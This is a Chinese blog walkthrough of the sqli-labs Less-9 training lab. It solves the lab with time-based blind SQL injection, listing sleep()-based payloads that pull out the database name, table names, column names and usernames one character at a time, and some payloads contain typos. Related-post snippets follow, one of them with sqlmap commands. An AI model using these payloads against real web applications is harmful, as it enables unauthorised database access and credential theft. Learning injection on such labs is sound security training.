sqli-labs less-9

最新推荐文章于 2024-04-17 22:54:04 发布
最新推荐文章于 2024-04-17 22:54:04 发布
阅读量133 收藏
点赞数 1
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52250313/article/details/115385887
版权

文章目录

sqli-labs less-9

本关和前几关的注入方式又不一样,不过我们还是按步骤来

* 判断注入

首先输入?id=1 回显正常

?id=1'  回显正常

?id=1"  回显正常

由此可知,本关没有布尔类型状态,输入语句的正确与否回显均为You are in…,故本关采用延时注入的方式

我们需要用到sleep函数

?id=1' and (sleep(5)) --+  耗时7秒

?id=1 and (sleep(5)) --+  耗时2秒

由此可知,注入方式为单引号注入

* 查询详细信息

  • 数据库长度

    ?id=1' and if (length(database())=8,sleep(5),1) --+

    若回显时长为7秒,则回显正常,数据库长度为8

  • 数据库名

    ?id=1' and if (substr(database(),1,1)='s',sleep(5),1) --+

(或?id=1' and if (ascii(substr(database(),1,1)=115),sleep(5),1) --+      ->'s')

?id=1' and if (substr(database(),2,1)='e',sleep(5),1) --+

?id=1' and if (substr(database(),3,1)='c',sleep(5),1) --+

?id=1' and if (substr(database(),4,1)='u',sleep(5),1) --+

?id=1' and if (substr(database(),5,1)='r',sleep(5),1) --+

?id=1' and if (substr(database(),6,1)='i',sleep(5),1) --+

?id=1' and if (substr(database(),7,1)='t',sleep(5),1) --+

?id=1' and if (substr(database(),8,1)='y',sleep(5),1) --+

  • 库中表的个数

    ?id=1' and if ((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1) --+

  • 求表名

    ?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 0,1)='emails',sleep(5),1) --+

?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 1,1)='referers',sleep(5),1) --+

?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 2,1)='uagents',sleep(5),1) --+

?id=1' and if ((select table_name from information_schema.tables where table_schema='security' limit 3,1)='users',sleep(5),1) --+

  • 列的长度

    ?id=1' and if ((select count(column_name) from information_schema.columns where table_name='users')=3,sleep(5),1) --+

  • 列名

    ?id=1' and if (substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='i',sleep(5),1) --+

(或?id=1" and if (ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),1,1)) = 105 --+      ->i)

?id=1' and if (substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)='d',sleep(5),1) --+

    由此可知,列一:id

    同理:

    列二:username

    列三:password

  • 求表中某字段的数量

    ?id=1' and if((select count(username) from users) = 13,sleep(5),1) --+  可知该字段的数量为13

  • 求字段的长度

    ?id=1' and if (length(username)=4,sleep(5),1) --+

  • 求字段名

    ?id=1' and if (ascii(substr((select username from users  limit 0,1),1,1)) = 68,sleep(5),1) --+    ->d

?id=1' and if (ascii(substr((select username from users  limit 0,1),2,1))= 117),sleep(5),1) --+   ->u

?id=1" and if (ascii(substr((select username from users  limit 0,1),2,1)) = 109,sleep(5),1) --+  ->m

?id=1" and if (ascii(substr((select username from users  limit 0,1),4,1)) = 98,sleep(5),1) --+    ->b

?id=1" and if (ascii(substr((select username from users  limit 0,1),4,1)) = 98,sleep(5),1) --+    ->b

即完成

阿刁〇하
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs(9)
jimggg的博客
03-19 194
sqlmap跑了一跑,肯定比较麻烦,因为路的时间有点长,看结果 基于时间的盲注,用单引号闭合 在我们注入了SQL代码之后,存在以下两种情况: 如果注入的SQL代码不影响后台[数据库]的正常功能执行,那么Web应用的页面显示正确(原始页面)。 如果注入的SQL代码影响后台数据库的正常功能(产生了SQL注入),但是此时Web应用的页面依旧显示正常(原因是Web应用程序采取了“重定向”或“屏蔽”措施)...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs(less-9)
不知名白帽的博客
07-14 956
sqli-labs(less-9)。less-9(时间盲注)
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,解析底层原理
2401_84433486的博客
04-17 777
测得第一列的名称的第一个字符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。(img-qkVA1lLi-1713365620107)]测得第一个表名的第一位是“e”,递推下去得到表名:emails。止,不再深入研究,那么很难做到真正的技术提升。下面尝试注users表。
sqli-labs:less-9(时间盲注)
羽的博客
07-21 414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset...
网络安全-sqlmap实战之sqlilabs-Less9
关注网络安全、云原生安全
06-29 1110
类型 时间盲注-单引号 -dbs枚举数据库 使用-o参数优化,,--technique参数指定技术,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch 过程 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms .
sqli-labs (less9-less10)
Xi4or0uji
07-27 770
less 9 get方法单引号绕过时间盲注 这关是时间盲注,因为无论是对还是错,回显都是you are in,为了区分,我们可以用sleep()函数,错误的时候返回就会延时,方便我们判断 payload是?id=1' and If(mid((select schema_name from information_schema.schemata limit 0,1),2,1)='h',1,sl...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs ————less -9
Fly_鹏程万里
05-11 1738
Less-9首先我们可以查看一下源代码:一方面:从标题中我们可以看到这是一个基于时间盲注的单引号注入另一方面:从之后的“print_r(mysql_error());”来看我们并不可以使用报错注入最后,我们可以看到可以通过' and 1=1 --+或者' or 1=1 --+来绕过既然如此,那么我就用延迟注入的方式来注入:猜解数据库:payload:http://192.168.11.136/sq...
sqli-labs less9详解
Brilliant_orange的博客
11-10 1383
【写在前面:建议:如果对SQL注入中SQL语句不熟悉的可以先看看如果看懂了这篇,这题就当应用了】
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1017
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行中使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 585
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
sql9
在通往牛逼的路上,我一路狂奔!
02-28 98
[code="java"] [Q]怎样建立基于函数索引 [A]8i以上版本,确保 Query_rewrite_enabled=true Query_rewrite_integrity=trusted Compatible=8.1.0以上 Create index indexname on table (function(field)); [Q]怎么样移动表或表分区 [A...
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2490
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
网络安全]sqli-labs Less-9 解题详析
等风来
07-23 2331
以上为[网络安全]sqli-labs Less-9 解题详析,后续将分享[网络安全]sqli-labs Less-10 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿刁〇하

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值